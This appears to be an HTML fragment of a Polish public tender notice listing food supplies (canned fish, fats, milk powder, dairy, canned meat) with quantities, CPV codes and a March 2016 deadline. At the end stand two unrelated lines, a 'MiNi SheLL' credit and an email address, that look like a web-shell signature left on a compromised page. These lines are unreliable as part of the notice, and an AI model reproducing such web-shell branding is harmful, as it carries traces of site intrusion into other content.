<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Konserwy rybne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III (Konserwy rybne)   CPV 15240000-2
1.Konserwa Szprot w sosie pomidorowym z samootwieraczem	- 1500 kg
2.Konserwa Sałatka rybna typu Neptun lub równoważne z samootwieraczem - 2000 kg
3.Konserwa Paprykarz szczeciński z samootwieraczem - 1500 kg
4.Konserwa Śledź w sosie pomidorowym z samootwieraczem - 1400 kg

(dowolne opakowanie o gramaturze w pełnych dziesiątkach gram np. 200g, 330g- nie dopuszcza się opakowań o wadze np. 225g, 175g,  itp).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.24.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Tłuszcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część IV (Tłuszcze)    CPV 15431100-8              
1.Tłuszcz roślinny (typu margaryna) do smarowania pieczywa o zawartości tłuszczu min 20%  w kostkach od 200g do 500g	- 18000 kg
2.Tłuszcz roślinny do smarowania pieczywa (typu Masło roślinne lub równoważne) o zawartości tłuszczu od 60% do 80% w kostkach od 150g do 300g - 2000 kg
3.Olej roślinny - 1300 litrów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.43.11.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Mleko granulowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część V (Mleko granulowane)  CPV 15511700-0       
1.Mleko odtłuszczone granulowane (minimalna zawartość białka - 34% , bez domieszki oleju roślinnego, dopuszcza się opakowania do 20 kg) - 1600 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.17.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VI (Nabiał)  CPV 15542100-0
1.Ser twaróg półtłusty w kostkach o wadze 0,2-1kg - 6000 kg
2.Serek fromage naturalny (w opakowaniu 100 gram) - 500 kg
3.Serek granulowany czysty (w opakowaniach od 100g do 200g) - 800 kg
4.Śmietana 12% - 2400 kg
5.Ser topiony czysty (op. 100 gram) o zawartości tłuszczu nie mniej niż 27% - 2000 kg
6.Kefir naturalny (opakowania 5-10 kg) - 1500 kg
7.Jogurt owocowy 100-150gr - 3000 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.54.21.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Konserwy mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VII (Konserwy mięsne) CPV 15131000-5
1.Pasztet drobiowy czysty (bez dodatków)  w alupack*	- 2500 kg
2.Konserwa mięsna ok. 300g (plus minus 10g) z samootwieraczem** - 2000 kg
3.Konserwa wieprzowa mielona sterylizowana w alupack* - 900 kg
4.Szynka mielona drobiowa sterylizowana w alupack* - 900 kg

* o wadze w zakresie 90-130g w pełnych dziesiątkach gram, np. 90, 100, ..., 130g - nie dopuszcza się opakowań o wadze np. 95g, 105g,  itp)
** dowolne opakowanie o gramaturze w pełnych dziesiątkach gram np. 200g, 330g- nie dopuszcza się opakowań o wadze np. 225g, 175g,  itp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com